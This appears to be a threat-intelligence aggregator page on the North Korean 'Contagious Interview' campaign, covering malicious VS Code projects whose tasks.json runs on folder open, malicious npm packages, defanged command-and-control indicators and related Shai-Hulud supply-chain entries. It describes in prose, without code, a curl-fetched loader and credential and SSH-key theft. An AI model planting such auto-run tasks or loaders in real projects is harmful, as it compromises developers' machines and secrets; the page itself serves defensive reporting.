Contagious Interview campaign uses malicious VS Code projects to deliver backdoors
Campaign
Summary
Hide ▲
Show ▼
The Contagious Interview campaign has expanded from malicious npm packages into VS Code-based lures that trick victims into cloning a booby-trapped repository and opening it in Microsoft Visual Studio Code. The latest reporting says a runOn: 'folderOpen' tasks.json file can auto-execute, pulling a loader that leads to BeaverTail and InvisibleFerret, while the campaign now spans 27 GitHub users and repositories dated from April 22, 2025 to December 1, 2025. The activity remains tied to North Korean threat actors and continues to target developers through fake programming assignments and trusted-looking open source projects.
Related Happenings
Shai-Hulud worm clone activity on NPM
Malware Activity
First: 18.05.2026 12:45
Last: 18.05.2026 12:45
Sources 1
About this happening:
The **Shai-Hulud** malware activity has continued to evolve across the **npm supply chain** and related developer ecosystems. It first infected **npm packages** in **September 202...
Shai-Hulud worm clone activity on NPM
Malware ActivityAbout this happening: The **Shai-Hulud** malware activity has continued to evolve across the **npm supply chain** and related developer ecosystems. It first infected **npm packages** in **September 202...
Shai-Hulud supply-chain campaign spreading via stolen CI/CD credentials
Campaign
First: 12.05.2026 14:29
Last: 12.05.2026 14:29
Sources 1
About this happening:
The **Shai-Hulud** **supply-chain campaign** remains active across **npm**, **PyPI**, and **Composer**, with the latest reporting tying **TeamPCP** to both a claimed **GitHub inte...
Shai-Hulud supply-chain campaign spreading via stolen CI/CD credentials
CampaignAbout this happening: The **Shai-Hulud** **supply-chain campaign** remains active across **npm**, **PyPI**, and **Composer**, with the latest reporting tying **TeamPCP** to both a claimed **GitHub inte...
Mini Shai-Hulud npm supply-chain malware wave
Malware Activity
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
Mini Shai-Hulud npm supply-chain malware wave
Malware ActivityAbout this happening: The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
TeamPCP Mini Shai-Hulud npm supply-chain campaign
Campaign
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **TeamPCP**-linked **Mini Shai-Hulud** campaign is a **malicious npm supply-chain operation** that steals developer credentials and abuses trusted publishing paths to spread t...
TeamPCP Mini Shai-Hulud npm supply-chain campaign
CampaignAbout this happening: The **TeamPCP**-linked **Mini Shai-Hulud** campaign is a **malicious npm supply-chain operation** that steals developer credentials and abuses trusted publishing paths to spread t...
Npm typosquatting campaign distributing WinOS 4.0 implant
Campaign
First: 09.05.2026 17:26
Last: 09.05.2026 17:26
Sources 1
About this happening:
A **npm typosquatting campaign** distributing the **WinOS 4.0 implant** overlapped with malicious repository activity, indicating a broader coordinated distribution effort beyond...
Npm typosquatting campaign distributing WinOS 4.0 implant
CampaignAbout this happening: A **npm typosquatting campaign** distributing the **WinOS 4.0 implant** overlapped with malicious repository activity, indicating a broader coordinated distribution effort beyond...
Timeline
-
02.03.2026 10:44 2 articles · 2mo ago
Contagious Interview adds malicious npm packages and Pastebin-based Vercel C2
Campaign Scope UpdateNorth Korean Contagious Interview operators published 26 malicious npm packages to the npm registry, using install.js and vendor/scrypt-js/version.js to pull steganographically hidden C2 locations from Pastebin and Vercel-hosted infrastructure. The chain used ext-checkdin.vercel[.]app and 103.106.67[.]63:1244/1247 to deliver a cross-platform RAT and modules for VS Code persistence, keylogging, browser credential theft, TruffleHog secret scanning, and Git and SSH key exfiltration.
Show sources
- North Korean Hackers Publish 26 npm Packages Hiding Pastebin C2 for Cross-Platform RAT — thehackernews.com — 02.03.2026 10:44
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
-
20.01.2026 20:41 3 articles · 4mo ago
Contagious Interview uses malicious VS Code projects against developers
Technical Analysis UpdateNorth Korean actors tied to Contagious Interview targeted developers with malicious Microsoft Visual Studio Code (VS Code) projects and cloned Git repositories that trigger tasks.json processing, runOn: folderOpen execution, and Vercel-hosted JavaScript payloads. The chain includes a macOS path using nohup bash -c with curl -s, a remote server at ip-regions-check.vercel[.]app, and follow-on payloads associated with BeaverTail, InvisibleFerret, Tsunami, TsunamiKit, XMRig, AnyDesk, and the malicious npm dependency grayavatar, enabling backdoor access, remote code execution, fingerprinting, keylogging, screenshots, and cryptocurrency mining.
Show sources
- North Korea-Linked Hackers Target Developers via Malicious VS Code Projects — thehackernews.com — 20.01.2026 20:41
- 'Contagious Interview' Attack Now Delivers Backdoor Via VS Code — www.darkreading.com — 22.01.2026 00:00
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25